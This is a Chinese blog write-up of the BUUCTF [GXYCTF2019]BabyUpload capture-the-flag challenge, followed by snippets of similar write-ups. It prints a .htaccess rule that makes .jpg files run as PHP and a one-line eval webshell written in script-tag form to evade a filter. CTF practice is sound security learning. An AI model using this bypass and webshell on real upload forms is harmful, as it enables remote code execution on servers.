BUUCTF [GXYCTF2019]BabyUpload

最新推荐文章于 2024-05-19 14:29:37 发布
最新推荐文章于 2024-05-19 14:29:37 发布
阅读量2k 收藏
点赞数
分类专栏: CTF日记 文章标签: php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/117280888
版权

文件上传题型。

 

直接上传一句话木马

可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。

key.htaccess文件内容如下:

AddType application/x-httpd-php .jpg

 抓包修改文件名上传成功。

接着上传图片马,发现;

 

猜测过滤<?;修改一句话如下:

<script language = 'php'>eval($_REQUEST[a]); </script>

构造图片马上传成功如下:

蚂蚁连接,得到flag

OK! 

 

 

 

carefree798
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 735
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
[GXYCTF2019]BabyUpload
pakho_C的博客
02-19 895
web第33题 [GXYCTF2019]BabyUpload 打开靶场 一道文件上传的题目 先直接上传图片 上传jpg,png,gif文件都会有这个提示,看来是对MIME类型做了限制,上传一个png文件,将mime类型改为image/jpeg可以上传,但是image/png不行 尝试直接上传php木马文件 提示后缀名不能有ph 添加空格,修改mime类型尝试绕过 又被检测了 仍然尝试绕过,都失败了,思考,提示“诶,别蒙我啊,这标志明显还是php啊”可能是对文件内容做了检测,例如不允许出现&
BUUCTF---web---[GXYCTF2019]BabyUpload
最新发布
2201_75556700的博客
05-19 160
4、上传包含该内容的test.txt,之后bp抓包修改文件名为.htaccess。2、上传php提示不能上传ph后缀,直接上传正常格式的图片提示太露骨了。5、利用重放器发送修改后的内容,发现成功上传了,放行。3、这里可以利用.htaccess进行绕过。6、接下来上传一句话木马test1.jpg。8、页面没有提示是图片错误,用蚁剑链接。
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1912
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
BUUCTF-[GXYCTF2019]BabyUpload
qq_43006864的博客
05-06 1177
直接开题。 上来就是一个文件上传。 这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。 所以这里想到了之前用过了.htaccess。 传入.htaccess,格式修改为image/jpeg。 上传成功, 传入php探针进行测试,这里推荐直接上phtml格式的马子。 传入php探针,并执行成功,看来是没问题的。这里路径大家参考这个: http://84247058-8c5c-496d-b573-d01266658f00.node4.b...
Excel中的xls、xlsx、xlsm混合文件,看我用Python如何统一处理......
pdcfighting的博客
02-07 356
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤洞房昨夜停红烛,待晓堂前拜舅姑。引言 Python语言,近几年在办公自动...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF:[GXYCTF2019]BabyUpload1
羽的博客
07-07 3059
文件上传漏洞。 不过这里我要吐槽一下,这个题首先他不允许传.png文件, 再者.jpg文件不能大,打了也报错,传不上去。 可想而知,我当时在做这个题的时候跟见了鬼一样难受,什么文件都传不了。 接着做题吧: 试着传一个PHP文件,告诉我不能传ph开头的文件后缀名,所以这里表示后端把所有phpphp的别名都封死了。 根据之前upload-labs积累的绕过姿势,还可以上传.htaccess文件。 再次上传一句话木马时,又被拦截了,这里应该是后端检测了文件内容。盲猜检测<...
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 602
BUUCTF的wp
buuctf-BabyUpload
m0_62094846的博客
03-26 891
上传php文件,过滤后缀 上传jpg文件 上传png文件,和文件类型有关(Content-Type) 所以应该要上传jpg文件类型 上传一句话木马就会出现问题,筛查后发现是<?php 改一下木马格式就可以了 <script language="php">eval($_REQUEST[value])</script> 但是后缀无法修改成php类型,各种方式都试过了 想到.htaccess和.user.ini 和文件类型有关,就修...
【学习笔记 41】 buu [GXYCTF2019]BabyUpload
weixin_43553654的博客
08-02 522
0x00 知识点 .htaccess文件上传绕过 0x01 知识点详解 请参考我上一篇学习笔记 0x02 解题思路 一看就知道是上传,尝试php3,phtml,普通一句话木马改后缀也不行,而且是添加了对文件的检测。 继续尝试利用.htaccess文件上传,首先上传一个.htaccess文件 <FilesMatch "flag.png"> SetHandler application/x-httpd-php </FilesMatch> 这里注意,这道题不知道为什么,我这
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 914
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
buuctf 极客大挑战2019php
08-24
buuctf 极客大挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值